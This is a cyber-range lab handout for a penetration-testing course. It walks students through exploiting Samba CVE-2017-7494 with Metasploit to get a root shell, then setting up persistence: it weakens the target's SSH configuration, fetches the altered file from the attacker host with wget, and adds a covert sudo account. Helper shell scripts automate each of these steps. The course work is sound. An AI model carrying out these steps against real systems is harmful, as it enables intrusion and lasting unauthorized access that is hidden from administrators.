
LAB_Exploitation


ITN263

Term: Fall 2024

Lesson Exercise 4 – Exploitation


Points Possible: 100

1. Overview

This exercise will demonstrate the use of various Tools, Techniques, and Procedures to complete the exploitation of a
target host based on a known vulnerability. I have highlighted all the commands, be sure to check for spelling or syntax
errors if the command fails. I have also included points in which you should insert screenshots of your output. I will be
using these screenshots for grading.

2. Resources required

This exercise uses the latest Cyber Range: Cyber Basics Environment.

3. Tasks

PART 1: Exploitation
Task 1: Logon to Kali Linux

Start and join the Cyber Basics Environment. If you are asked to log in, use the username: student and password:
student.

Task 2: Examine the details of the vulnerability

After looking at all the data gathered during the Enumeration and Vulnerability Scanning exercises, the best vulnerability
to use for an exploit is the SMB vulnerability CVE-2017-7494. It is a remote code execution flaw in the Samba SMB server
(Samba 3.5.0 onward, fixed in 4.6.4, 4.5.10 and 4.4.14): a client that can write to a share uploads a shared library and
then makes the server load and execute it inside the smbd process, which runs as root.

Examine the details of the Common Vulnerabilities and Exposures (CVE) at the following link:

https://www.cvedetails.com/cve/CVE-2017-7494/?q=CVE-2017-7494

From the left pane of the page, click on (1 Metasploit modules) to find information about the Metasploit Module.

©2024 Virginia Cyber Range. Created by Matthew Vogel. (CC BY-NC-SA 4.0)

The Metasploit module is exploit/linux/samba/is_known_pipename, titled "Samba is_known_pipename() Arbitrary Module Load".

Now that we have identified a vulnerability to exploit and know the Metasploit module name, it is time to get serious.

Task 3: Start Metasploit

Metasploit is a penetration testing framework that comes installed in Kali Linux. Metasploit commands are run from the
command line.

First, you need to start Metasploit Framework Console (msfconsole). There are several steps to properly starting the
msfconsole.

First, you need to start the postgresql database service. Metasploit uses this database to store information gathered via
penetration testing activities. You will need to use the sudo command to run this command. The sudo command runs a
command with root-level privileges.

sudo service postgresql start

Second, you must initialize the msf database using the msfdb init command as follows.

sudo msfdb init

Finally, you can start the Metasploit Framework Console by using the msfconsole command as follows:

msfconsole

The msfconsole will start and give you the msf > prompt once startup has completed. msfconsole has its own command set;
do not count on ordinary Linux commands behaving as they do in a normal terminal (some are passed through to the system
shell, but open a second terminal window for Linux work).

To see a list of available commands from the msf> prompt, type a ? and press enter.

 Insert a screenshot of the ? output:


The first command you will use is the search command which will allow you to look for information on the Metasploit
exploit that you will use for this penetration test.

You can search for a CVE number or a Metasploit module name. Use the search command to look for the Metasploit
module that corresponds to the vulnerability we discovered using both the CVE number cve-2017-7494 and the name
is_known_pipename using the following commands from the msf> prompt:

search cve-2017-7494

 Insert a screenshot of the search cve-2017-7494 output:


search is_known_pipename

 Insert a screenshot of the search is_known_pipename output:


As you can see from the examples above, both methods of search produce the same results. The search command
shows there is an exploit, the location of the exploit, the disclosure date, the rank, and the description of the exploit.
You can now use this information to exploit the target.

Next, you will use the use command to load the exploit as follows:

use exploit/linux/samba/is_known_pipename

When using the use command, you have to use the full path as shown in the name column of the search results as in the
examples above.

The prompt will change to show the name of the exploit that was loaded. Now use the options command to see the
options for the exploit as follows:

options

 Insert a screenshot of the options output:


If you look at the options list, the first option, RHOSTS (older Metasploit releases show it as RHOST; either name works
with set, because Metasploit treats them as aliases), is blank and is required. It is the IP address of the target
system. Whenever you are attempting to exploit a target system, you always have to provide the remote host.

You can use the set command to set the remote host option. The target_ip is the IP address of the target system
identified in previous exercises: the host we used in the last enumeration lab. To find that address, open a new terminal
window (a normal Linux terminal, not the msfconsole) and follow these steps:

route
nmap network_IP/20 (use the network you found with the route command)

The first command shows the networks your Kali system is attached to; the second port-scans that network. Find the host
with all the open ports and record its IP address here:

192.168.0.11****


Now you can set the remote host using that address:

set rhost target_ip

Once the remote host option is set, launch the exploit with the exploit command:

exploit

If the exploit fails the first time, check that the target IP address is correct with the options command and run the
exploit again. If the exploit succeeds, you will get a Command shell session 1 opened message, which means the exploit
ran on the target system and you now have a shell there.
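The msfconsole steps above (start the database, load the module, set the remote host, launch the exploit) can be recorded in a Metasploit resource script so that the run is repeatable and logged. The script below is an added example, not part of the original handout or of Metasploit itself: the module path and option names are Metasploit's own, but the target address, file names and spool path are assumptions for illustration. The IPv4 check matters because the address is written into a file that msfconsole executes.

```shell
#!/bin/bash
# Added example, not part of the original lab: turn the msfconsole steps into a
# Metasploit resource script.  Module path and option names are Metasploit's
# own; the target address, file names and spool path are assumptions.

# write_rc TARGET_IP OUTFILE
# Validates the address (it is written verbatim into a file that msfconsole
# executes) and writes a script that loads the module, sets the remote host,
# launches the exploit without attaching to the session (-z) and lists the
# sessions that resulted.  Returns 1 for anything that is not a dotted quad.
write_rc() {
    target="$1"
    outfile="$2"
    if ! printf '%s\n' "$target" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'; then
        echo "write_rc: '$target' is not an IPv4 address" >&2
        return 1
    fi
    cat > "$outfile" <<EOF
# Resource script: Samba CVE-2017-7494 against $target (generated by write_rc)
spool /tmp/msf-$target.log
use exploit/linux/samba/is_known_pipename
set RHOSTS $target
options
exploit -z
sessions -l
EOF
}

# run_rc OUTFILE
# The database steps from Task 3, then msfconsole in quiet mode running the
# script.  Skipped (with the script left in place) where msfconsole is not
# installed, so the file can be generated on any machine.
run_rc() {
    rcfile="$1"
    if ! command -v msfconsole >/dev/null 2>&1; then
        echo "msfconsole not found; resource script left at $rcfile" >&2
        return 0
    fi
    sudo service postgresql start
    sudo msfdb init
    msfconsole -q -r "$rcfile"
}

# Usage on Kali (assumed target address; use the one you recorded above):
#   write_rc 192.168.0.11 ~/is_known_pipename.rc && run_rc ~/is_known_pipename.rc
#   then, inside msfconsole: sessions -i 1
```

spool writes everything the console prints to the named file, which doubles as the command log this exercise asks you to keep; -z keeps the console from attaching to the new session so the remaining lines of the script still run, and you attach afterwards with sessions -i.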


 Insert a screenshot of your output. It will resemble the sample in the original handout (image not reproduced here),
but with your own IP addresses.

[NOTE: In that sample, the target IP address is 10.1.68.250. The IP address of the target host in your network may be
different.]

After the Command shell session 1 opened, you will just have a blinking cursor and no indication that you have entered
a shell on the target system. Use the whoami command to see what account you are logged in to in the shell on the
target system as follows:

whoami

 Insert a screenshot of the whoami output:

You should see that you are the root user. Success!

You can also use the hostname command to see the target system hostname, the pwd command to see the current
directory that you are in on the target system, and the ip addr command to see the IP address of the target system.

The basic shell is a little difficult to work with: it gives you no prompt and no feedback when a command fails. You can
get a more usable shell by using Python to allocate a pseudo-terminal. Use the following command to create a more useful
shell on the target system (if the target reports that python is not found, use python3 in its place):

python -c 'import pty; pty.spawn("/bin/bash")'


This command uses the Python pty module to start a new bash shell attached to a pseudo-terminal, which is what gives you
a prompt and proper line editing. Bash is the default shell on most Linux systems.


PART 2: Post-Exploitation
Task 1: Copy the SSH server configuration from the target system

If you remember back to the enumeration phase, there is an SSH server running on the target system, but it accepts only
public-key authentication. Since you are now the root user with a shell on the target system, you can modify the SSH
server configuration so that you can log on with just a username and password. This gives you a way back in without
having to exploit the vulnerability every time (it is also exactly the kind of configuration change a defender should be
watching for).

Editing the SSH server configuration file via the current shell is possible but awkward. An easier way is to copy the
/etc/ssh/sshd_config file to the Kali Linux system, edit the file there, and then put it back on the target system.

On the target system via your msfconsole shell, change to the /etc/ssh/ directory using the cd command as follows:

cd /etc/ssh/

Use the cat command to view the sshd_config file as follows:

cat sshd_config

 Insert a screenshot of the cat output:

On your Kali Linux system, open a new terminal window and create a new directory name sshd in the student home
directory as shown below. This directory will be used to hold the sshd config file that you copy from the target system.
The ~/ in the following command means the home directory of the current user:


mkdir ~/sshd

On your Kali Linux system, open a text editor named Mousepad by going to Applications in the top left-hand corner of
the desktop, type Mousepad into the search bar, and select Mousepad from the list of apps.

Copy and paste the sshd_config file from the shell on the target system into the text editor on your Kali Linux system.
Make sure you get the entire file starting with line # $OpenBSD: sshd_config and going to the last line # ForceCommand
cvs server. When copying the text from a terminal window, you have to highlight the text and then select Edit and Copy
from the menu at the top of the terminal window.


You can now paste the copied text into the Mousepad application.

Task 2: Edit SSH server configuration on the Kali system


Edit the sshd_config file in the Mousepad application to allow password authentication and keyboard-interactive
(challenge/response) password prompts.

Change the line:

PasswordAuthentication no

TO

PasswordAuthentication yes

And change the following line:

ChallengeResponseAuthentication no

TO

ChallengeResponseAuthentication yes

PasswordAuthentication yes is the setting that actually permits a plain password login; the second one enables the PAM
keyboard-interactive prompt as well. On OpenSSH 8.7 and later the keyword is named KbdInteractiveAuthentication, with
ChallengeResponseAuthentication kept as an alias, so edit whichever name your target's file uses. Keep each keyword on
a single line and do not leave a # in front of it, or sshd will ignore it.

Save the file and name it sshd_config and place it in the sshd folder you just created on your Kali Linux system. When
you select File and Save in the Mousepad application, the default location will be the student home folder. You will
have to select the sshd folder.

On the Kali Linux system in a terminal window, change to the new sshd directory you created as follows:

cd ~/sshd

On the Kali Linux system, use the ls command to verify the sshd_config file is present.

 Insert a screenshot of the ls output:


Task 3: Put the modified SSH server configuration back on the target system


Now you have to get the file back to the target system, but the shell gives you no way to paste a file into it.

Luckily Python can help here too. The Python standard library includes a module that starts a simple HTTP server in any
directory: SimpleHTTPServer serves a directory listing and makes every file in the directory where it was started
downloadable over HTTP. You can then fetch any of those files from another host.

Make sure you are in the sshd directory on your Kali Linux system as follows:

cd ~/sshd

Start the SimpleHTTPServer on port 8000 on your Kali Linux system using the command shown below. Web servers normally
use port 80; however, it is recommended you use a different port to avoid conflicts with any other service that may be
running on your Kali Linux system. The -m option tells python to run a module, in this case SimpleHTTPServer.
SimpleHTTPServer is a Python 2 module, so the command below uses the python2 interpreter. On a Kali image that ships only
Python 3, the equivalent server is the http.server module.

python2 -m SimpleHTTPServer 8000

Leave this terminal alone while the server is running: it logs each request there, and pressing CTRL + C stops it.

Test the SimpleHTTPServer with a web browser in Kali Linux by going to http://127.0.0.1:8000. Verify that the
sshd_config file is listed on the webpage. The 127.0.0.1 IP address is the loopback address for your Kali Linux system.

On the target system via your msfconsole shell, change to the /etc/ssh directory as follows:

cd /etc/ssh

On the target system via your msfconsole shell, move the current sshd_config file to sshd_config_old to make way for
the newly edited file. Always rename a file you are replacing rather than overwriting it, so that you can revert by
renaming it back; an overwritten file is gone for good. To rename a file in Linux, you use the mv (move) command.

mv sshd_config sshd_config_old

On the target system via your msfconsole shell, use the wget command to get the new sshd_config file from your Kali
Linux system via HTTP. If you do not know the IP address of your Kali Linux system, run ip addr in a Kali terminal to
find it. Be sure to replace kali_linux_ip with the IP address of your Kali Linux system. wget is a command line HTTP
client that downloads files from an HTTP server; when no scheme is given it assumes http://.

wget kali_linux_ip:8000/sshd_config

 Insert a screenshot of the wget output:

On the target system via your msfconsole shell, use the ls command to verify that the sshd_config file has been
downloaded as follows:

ls sshd_config

 Insert a screenshot of the ls output:
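The hand-off above (serve the directory on Kali, fetch the file on the target) has no integrity check: a truncated or mis-served file would be installed as the SSH server configuration without anyone noticing. The functions below are an added example, not part of the original handout: they start the same kind of web server (python2's SimpleHTTPServer, or python3's http.server when Python 2 is not installed), fetch with wget (or curl), and compare SHA-256 digests on both ends. roundtrip_demo exercises the whole path on the loopback interface with a constructed stand-in file; the port and paths are assumptions.

```shell
#!/bin/bash
# Added example, not part of the original lab: the Kali-to-target HTTP hand-off
# with an integrity check.  Serves with python2's SimpleHTTPServer, or python3's
# http.server when Python 2 is absent; fetches with wget (what the target has
# here) or curl; compares SHA-256 digests.  Ports and paths are assumptions.

# serve_dir DIR PORT  -> prints the PID of the background web server.
# Binds all interfaces, as the lab needs, so the target can reach it.
serve_dir() {
    dir="$1"; port="$2"
    if command -v python2 >/dev/null 2>&1; then
        (cd "$dir" && exec python2 -m SimpleHTTPServer "$port" >/dev/null 2>&1) &
    else
        (cd "$dir" && exec python3 -m http.server "$port" >/dev/null 2>&1) &
    fi
    echo $!
}

# fetch_and_verify URL DEST EXPECTED_SHA256
# Downloads DEST from URL and deletes it again unless its digest matches the
# one computed on the sending side (sha256sum FILE on Kali).
fetch_and_verify() {
    url="$1"; dest="$2"; expected="$3"
    if command -v wget >/dev/null 2>&1; then
        wget -q -O "$dest" "$url" || { rm -f "$dest"; return 1; }
    else
        curl -fsS -o "$dest" "$url" || { rm -f "$dest"; return 1; }
    fi
    actual=$(sha256sum "$dest" | awk '{print $1}')
    if [ "$actual" != "$expected" ]; then
        echo "digest mismatch for $dest: got $actual, expected $expected" >&2
        rm -f "$dest"
        return 1
    fi
}

# roundtrip_demo
# Serves a constructed stand-in for sshd_config on the loopback interface,
# fetches it, checks the digest, then confirms that a wrong digest is refused.
# Returns 0 on success, 1 on failure, 2 if the needed tools are missing.
roundtrip_demo() {
    command -v sha256sum >/dev/null 2>&1 || return 2
    { command -v python3 || command -v python2; } >/dev/null 2>&1 || return 2
    { command -v wget || command -v curl; } >/dev/null 2>&1 || return 2
    srcdir=$(mktemp -d); dstdir=$(mktemp -d)
    printf 'PasswordAuthentication yes\n' > "$srcdir/sshd_config"   # constructed sample
    expected=$(sha256sum "$srcdir/sshd_config" | awk '{print $1}')
    port=$(( 20000 + $$ % 20000 ))
    pid=$(serve_dir "$srcdir" "$port")
    rc=1
    for attempt in 1 2 3 4 5 6 7 8; do          # the server needs a moment to bind
        if fetch_and_verify "http://127.0.0.1:$port/sshd_config" "$dstdir/sshd_config" "$expected"; then
            rc=0; break
        fi
        sleep 1
    done
    if [ "$rc" -eq 0 ]; then
        # A wrong digest must be refused and the downloaded file removed.
        if fetch_and_verify "http://127.0.0.1:$port/sshd_config" "$dstdir/bad" 0000; then rc=1; fi
        if [ -e "$dstdir/bad" ]; then rc=1; fi
    fi
    kill "$pid" 2>/dev/null || true
    rm -rf "$srcdir" "$dstdir"
    return "$rc"
}

# Usage.  On Kali:   pid=$(serve_dir ~/sshd 8000); sha256sum ~/sshd/sshd_config
# On the target:     fetch_and_verify http://kali_linux_ip:8000/sshd_config \
#                        /etc/ssh/sshd_config <digest printed on Kali>
```

The digest printed by sha256sum on Kali is carried over by hand (it is short enough to type into the target shell), so the check does not depend on the transfer channel it is verifying.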

Now that you have the new sshd_config file in place, restart the sshd service on the target system via your msfconsole
shell as follows:

service sshd restart

On Debian and Ubuntu targets the service is named ssh, so if that command reports an unrecognized service, use service
ssh restart instead. It is worth running sshd -t first: it checks the configuration for errors without restarting, and
a typo in sshd_config that stops the daemon from starting would lock everyone, including you, out of SSH.

The SSH server on the victim system should now accept a username and password.
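Tasks 2 and 3 toggle two keywords, keep a backup and restart the daemon. The shell functions below do the same thing directly on the target, in place, with sed; they are an added example, not part of the original handout. Keywords are rewritten whether or not they are currently commented out, a _old backup is kept as the lab does, the value sshd will actually use is read back (sshd takes the first uncommented occurrence of a keyword), the configuration is syntax-checked with sshd -t before the restart, and the restart uses whichever service name the target has. File names are assumptions, and the sample configuration used to exercise the functions is constructed.

```shell
#!/bin/bash
# Added example, not part of the original lab: make the Task 2 edits in place
# on the target with sed, keep the _old backup from Task 3, read back what sshd
# will use, and restart safely.  File names are assumptions.

# set_directive FILE KEY VALUE
# Rewrites every line for KEY, commented out or not, to "KEY VALUE"; appends
# the line if KEY does not appear at all.  Does not follow Include files
# (OpenSSH 8.2+); check /etc/ssh/sshd_config.d/ by hand on such targets.
set_directive() {
    file="$1"; key="$2"; value="$3"
    if grep -Eq "^[[:space:]]*#?[[:space:]]*${key}([[:space:]]|$)" "$file"; then
        sed -E -i "s/^[[:space:]]*#?[[:space:]]*${key}([[:space:]].*)?$/${key} ${value}/" "$file"
    else
        printf '%s %s\n' "$key" "$value" >> "$file"
    fi
}

# effective_value FILE KEY
# Prints the value sshd would use.  sshd_config(5): the first obtained value
# for a keyword wins, so later duplicates are ignored; a keyword that never
# appears uncommented is reported as "default".
effective_value() {
    file="$1"; key="$2"
    val=$(grep -E "^[[:space:]]*${key}[[:space:]]+" "$file" | head -n 1 | awk '{print $2}')
    printf '%s\n' "${val:-default}"
}

# enable_password_auth FILE
# Backup (once), then the two changes from Task 2.  OpenSSH 8.7 renamed
# ChallengeResponseAuthentication to KbdInteractiveAuthentication; the new
# name is set as well when the file uses it.  Returns 1 if the edit did not
# take effect.
enable_password_auth() {
    file="$1"
    [ -f "${file}_old" ] || cp -p "$file" "${file}_old"
    set_directive "$file" PasswordAuthentication yes
    set_directive "$file" ChallengeResponseAuthentication yes
    if grep -Eq '^[[:space:]]*#?[[:space:]]*KbdInteractiveAuthentication' "$file"; then
        set_directive "$file" KbdInteractiveAuthentication yes
    fi
    [ "$(effective_value "$file" PasswordAuthentication)" = yes ]
}

# restart_sshd
# sshd -t checks the live configuration without restarting; a bad file would
# otherwise leave the daemon down and lock you out too.  Debian and Ubuntu
# name the service ssh, Red Hat-style systems sshd.
restart_sshd() {
    sshd -t || { echo "sshd_config has errors; not restarting" >&2; return 1; }
    service ssh restart 2>/dev/null || service sshd restart
}

# Usage on the target (as root):
#   enable_password_auth /etc/ssh/sshd_config && restart_sshd
```

effective_value is the check to run after the restart: if it does not print yes for PasswordAuthentication, an earlier uncommented line (or a Match block) is overriding your edit and the password login will still be refused.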

Task 4: Create a user with sudo access on the target system

The question now is which username and password you should use to log in. You have root-level access but do not
know the root password and do not want to change the root password. Changing the root password may alert system
administrators when the root password no longer works for them.


On the target system via your msfconsole shell, use the adduser command to add a new user to the victim system, then set
its password with the passwd command. In the example below the username is yourname; put your actual first name in its
place. passwd takes the username as its argument and then prompts for the new password (the lab uses sekret); the
password is typed at the prompt, never on the command line. The original handout showed passwd sekret, which would try
to change the password of a user named sekret instead. If adduser's prompts behave oddly, it is because the bare shell
has no terminal; the python pty command from Part 1 fixes that.

adduser yourname
passwd yourname

 Insert a screenshot of the output:

You will also need to add the new user to the sudo group with the usermod command so the user can execute commands as
root. Use -a together with -G: -G on its own replaces the user's supplementary group list with the one you name,
whereas -aG appends to it.

usermod -aG sudo yourname

On the Kali Linux system, in the terminal window where the SimpleHTTPServer is still running, press CTRL + C to stop the
server and return to the prompt (the file has already been transferred). Then use the new account you created on the
target system to SSH into the target system from your Kali system. You will need the password you set for the new user.
Be sure to replace target_system_ip with the IP address of your target system.

ssh yourname@target_system_ip

 Insert a screenshot of the ssh output:

On the target system via your SSH shell, test that sudo works for the new account:

sudo whoami

You will be prompted for the user's password; if sudo prints root, the account can run commands as root. (The original
handout used sudo echo test > testfile and checked for the file, but that check cannot fail: the redirection is
performed by your own unprivileged shell, which creates testfile whether or not sudo succeeded.)

 Insert a screenshot of the sudo output:

You are now able to access the target system at will without having to exploit the vulnerability. Even if the vulnerability
is patched, you will have access to the target system with your new user account via SSH.
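Task 4 done without interactive prompts (which misbehave in a shell that has no terminal), together with two checks that actually prove the result: membership read from /etc/group, and a sudo command whose output comes from the root process. This is an added example, not part of the original handout; yourname and the password are placeholders, and the group file used to exercise is_member is constructed.

```shell
#!/bin/bash
# Added example, not part of the original lab: create the persistence account
# non-interactively and verify it.  User name and password are placeholders.

# is_member GROUPFILE USER GROUP  -> 0 if USER is listed in GROUP
# Parses "name:x:gid:member1,member2" lines, so it can be run against a copy
# of /etc/group as well as the live file.
is_member() {
    awk -F: -v u="$2" -v g="$3" '
        $1 == g { n = split($4, m, ","); for (i = 1; i <= n; i++) if (m[i] == u) found = 1 }
        END { exit found ? 0 : 1 }' "$1"
}

# add_sudo_user USER PASSWORD
# useradd with a home directory and bash, the password fed to chpasswd on
# stdin (no prompt, nothing on the command line), and usermod -aG so any
# supplementary groups the user already has are preserved.  Must run as root.
add_sudo_user() {
    user="$1"; pass="$2"
    [ "$(id -u)" -eq 0 ] || { echo "add_sudo_user: must be root" >&2; return 1; }
    id "$user" >/dev/null 2>&1 || useradd -m -s /bin/bash "$user"
    printf '%s:%s\n' "$user" "$pass" | chpasswd
    usermod -aG sudo "$user"
    is_member /etc/group "$user" sudo
}

# verify_sudo
# Run on the target after logging in over SSH as the new user.  Unlike
# "sudo echo test > testfile", whose redirection is done by the unprivileged
# shell, the string compared here is produced by the process sudo started.
verify_sudo() {
    [ "$(sudo whoami)" = root ]
}

# Usage on the target (as root, via the msfconsole shell):
#   add_sudo_user yourname sekret
# then from Kali: ssh yourname@target_system_ip, and in that session: verify_sudo
```

Group membership is read at login, so the sudo check has to be made from a fresh SSH session rather than from the shell that ran usermod.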

5. References

https://metasploit.help.rapid7.com/docs
https://www.kali.org/kali-linux-documentation/
https://www.ssh.com/ssh/command/


This exercise is designed to use the latest Cyber Range Cyber Basics Environment. All students will have to register for
an account to access the Cyber Range. The instructor will have to create a class and add the Cyber Basics Environment
for the students to be able to use.

The grading for this exercise is based on the output provided by the students. Each student’s environment will be a little
different so there is no master answer key. Students should be encouraged to document their work via a Penetration
Testing Log which they can turn in for grading. The log can be done in any word processing application and should
contain a list of tasks completed, commands run for each task, screenshots of the output from each task, and any issues
encountered during the exercise. The instructor should review the log to ensure that the students are mastering the
appropriate skills.

For this exercise, the students should document all of the steps that they took to gain persistent access to the target
system and any issues they encountered.
